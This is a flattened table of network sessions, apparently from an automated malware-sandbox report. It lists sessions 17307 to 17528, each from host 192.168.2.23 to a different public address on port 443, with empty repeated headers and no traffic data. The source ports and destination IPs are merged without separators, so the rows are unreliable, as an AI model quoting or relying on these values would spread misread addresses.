                                          17307192.168.2.234338269.62.100.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17308192.168.2.2344338179.4.198.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17309192.168.2.2360656165.186.12.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17310192.168.2.2336308210.94.171.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17311192.168.2.234973889.137.39.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17312192.168.2.2334208160.225.144.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17313192.168.2.2343586110.177.149.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17314192.168.2.2350734104.89.61.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17315192.168.2.2345852177.54.247.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17316192.168.2.2352244160.137.2.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17317192.168.2.2351254145.4.72.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17318192.168.2.2350740138.75.139.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17319192.168.2.2350722195.208.66.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17320192.168.2.2355256166.195.121.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17321192.168.2.2357908180.111.104.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17322192.168.2.234650427.197.149.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17323192.168.2.235561463.231.195.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17324192.168.2.2336426176.165.132.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17325192.168.2.2336924145.161.242.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17326192.168.2.235782461.93.146.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17327192.168.2.2349260185.37.20.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17328192.168.2.233318867.77.30.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17329192.168.2.2339602100.151.26.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17330192.168.2.234968234.6.118.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17331192.168.2.2346468181.66.35.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17332192.168.2.2350396107.98.245.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17333192.168.2.2352636115.182.161.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17334192.168.2.234829852.165.54.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17335192.168.2.23601068.192.9.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17336192.168.2.2338628201.158.72.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17337192.168.2.2343328120.13.6.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17338192.168.2.2335858221.61.91.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17339192.168.2.2350732128.109.169.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17340192.168.2.23358448.102.92.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17341192.168.2.2336048207.107.128.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17342192.168.2.2351964201.0.225.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17343192.168.2.2334554140.52.139.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17344192.168.2.2351702128.227.246.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17345192.168.2.234502860.111.203.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17346192.168.2.2333260182.186.150.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17347192.168.2.2342086191.184.196.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17348192.168.2.2357780165.158.79.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17349192.168.2.234115427.101.222.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17350192.168.2.234150046.121.85.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17351192.168.2.2349120152.185.201.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17352192.168.2.2355038163.92.183.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17353192.168.2.234196868.89.6.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17354192.168.2.2342784132.8.129.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17355192.168.2.2352656108.197.102.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17356192.168.2.2339924213.28.69.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17357192.168.2.234322040.231.188.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17358192.168.2.234645849.11.50.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17359192.168.2.2349702112.207.254.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17360192.168.2.2346456164.243.68.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17361192.168.2.2346504159.167.134.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17362192.168.2.235463438.74.31.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17363192.168.2.2354958148.180.143.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17364192.168.2.233369842.119.59.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17365192.168.2.233860451.51.200.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17366192.168.2.234252695.0.29.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17367192.168.2.23396028.114.52.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17368192.168.2.234588098.193.200.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17369192.168.2.2338590103.92.102.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17370192.168.2.2352052132.218.156.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17371192.168.2.2339720182.229.249.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17372192.168.2.2356528218.180.186.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17373192.168.2.235317693.36.10.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17374192.168.2.234813489.178.108.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17375192.168.2.2345762183.234.1.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17376192.168.2.234383654.67.240.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17377192.168.2.235432838.40.105.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17378192.168.2.235570245.23.109.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17379192.168.2.2349318206.2.255.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17380192.168.2.236008039.114.35.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17381192.168.2.234735848.92.219.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17382192.168.2.2357582112.128.105.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17383192.168.2.235826818.251.37.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17384192.168.2.233973697.240.164.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17385192.168.2.234712023.213.58.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17386192.168.2.234966457.199.39.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17387192.168.2.235275873.51.237.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17388192.168.2.2346906169.32.120.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17389192.168.2.234079270.156.63.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17390192.168.2.233456681.226.195.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17391192.168.2.2336348115.76.16.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17392192.168.2.233885074.156.74.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17393192.168.2.235977294.34.108.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17394192.168.2.235072457.19.17.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17395192.168.2.235868694.88.83.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17396192.168.2.2333160181.245.119.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17397192.168.2.234488284.46.102.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17398192.168.2.2353738185.237.43.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17399192.168.2.2345002124.123.163.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17400192.168.2.2352958110.57.102.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17401192.168.2.233435264.201.71.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17402192.168.2.2340300201.118.136.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17403192.168.2.235054444.23.215.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17404192.168.2.235182496.194.197.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17405192.168.2.233768231.41.85.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17406192.168.2.235358675.221.58.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17407192.168.2.2348546140.163.122.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17408192.168.2.2342756175.245.12.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17409192.168.2.2350516162.115.102.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17410192.168.2.233712290.104.230.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17411192.168.2.2334876181.149.131.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17412192.168.2.233354237.124.32.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17413192.168.2.234111658.2.193.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17414192.168.2.234457070.93.185.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17415192.168.2.234729274.161.166.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17416192.168.2.2359732213.203.23.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17417192.168.2.235737451.98.100.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17418192.168.2.235425270.199.166.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17419192.168.2.235934090.69.245.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17420192.168.2.2337946221.124.203.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17421192.168.2.233752214.46.13.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17422192.168.2.2347374176.221.127.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17423192.168.2.2334072164.72.253.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17424192.168.2.2355798174.80.25.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17425192.168.2.234167653.201.238.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17426192.168.2.2350318136.144.169.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17427192.168.2.2335318195.15.214.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17428192.168.2.234528250.255.204.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17429192.168.2.2360898193.235.61.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17430192.168.2.2357348210.189.96.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17431192.168.2.235975846.29.30.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17432192.168.2.2333620176.246.75.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17433192.168.2.2338420198.138.91.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17434192.168.2.235872882.161.112.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17435192.168.2.2343108167.236.156.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17436192.168.2.2359242115.30.33.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17437192.168.2.234193858.43.167.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17438192.168.2.2345652108.134.80.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17439192.168.2.234565225.250.131.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17440192.168.2.2346566125.195.57.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17441192.168.2.235493874.194.58.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17442192.168.2.2341230186.72.161.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17443192.168.2.2356920189.130.199.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17444192.168.2.2354280208.189.30.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17445192.168.2.2353044221.234.229.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17446192.168.2.233847263.33.15.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17447192.168.2.233549231.221.143.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17448192.168.2.2353000100.132.78.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17449192.168.2.2343666186.191.108.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17450192.168.2.2343184174.171.198.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17451192.168.2.2335118222.193.101.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17452192.168.2.2358064106.42.190.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17453192.168.2.234965457.230.177.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17454192.168.2.234649899.6.21.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17455192.168.2.233924812.158.20.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17456192.168.2.2355268122.57.21.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17457192.168.2.235819440.84.223.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17458192.168.2.2354178151.137.212.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17459192.168.2.2359846206.89.190.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17460192.168.2.2356756201.206.5.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17461192.168.2.2348014169.219.207.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17462192.168.2.2344128184.108.185.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17463192.168.2.2336282200.67.70.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17464192.168.2.2341200153.48.154.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17465192.168.2.235619288.106.34.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17466192.168.2.234890038.171.153.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17467192.168.2.235156238.161.13.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17468192.168.2.2347614219.57.147.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17469192.168.2.2338812137.139.74.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17470192.168.2.2340160136.14.243.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17471192.168.2.234711223.245.104.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17472192.168.2.234441232.61.225.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17473192.168.2.2352704153.249.9.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17474192.168.2.2337606165.30.183.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17475192.168.2.234665431.73.24.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17476192.168.2.2360404116.145.3.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17477192.168.2.234197262.228.120.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17478192.168.2.2357926107.243.57.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17479192.168.2.2339528190.111.160.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17480192.168.2.235046612.45.155.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17481192.168.2.234591899.172.170.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17482192.168.2.2343582223.105.154.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17483192.168.2.233699699.75.78.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17484192.168.2.233298094.14.100.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17485192.168.2.2349422194.35.211.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17486192.168.2.2341774160.65.252.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17487192.168.2.233766679.33.76.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17488192.168.2.2334640152.110.198.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17489192.168.2.235495689.243.211.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17490192.168.2.234205280.78.209.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17491192.168.2.235255079.111.200.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17492192.168.2.2355232186.21.61.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17493192.168.2.2333034190.25.139.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17494192.168.2.2340562146.70.116.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17495192.168.2.235753425.131.107.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17496192.168.2.2359678197.162.165.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17497192.168.2.234179238.54.236.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17498192.168.2.2353070134.71.234.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17499192.168.2.2342500156.211.174.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17500192.168.2.235474249.149.30.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17501192.168.2.2359604146.0.233.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17502192.168.2.235686642.156.225.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17503192.168.2.235681836.131.99.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17504192.168.2.233297090.42.173.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17505192.168.2.2338878175.223.17.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17506192.168.2.234386684.22.147.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17507192.168.2.235645449.172.18.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17508192.168.2.2360796111.42.46.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17509192.168.2.2341710186.134.51.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17510192.168.2.2343624137.246.227.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17511192.168.2.2338780101.150.2.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17512192.168.2.235807869.62.94.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17513192.168.2.235994449.36.164.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17514192.168.2.2338408142.88.247.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17515192.168.2.2340166160.3.172.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17516192.168.2.2356994182.29.141.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17517192.168.2.2350692143.241.61.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17518192.168.2.233693818.46.217.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17519192.168.2.234794868.158.139.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17520192.168.2.2344366117.91.181.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17521192.168.2.2345954125.43.231.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17522192.168.2.233911817.53.121.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17523192.168.2.2347808193.20.82.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17524192.168.2.2335164174.175.103.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17525192.168.2.2350854195.200.107.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17526192.168.2.2360680100.57.83.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17527192.168.2.235995865.94.252.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17528192.168.2.2339868131.229.33.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
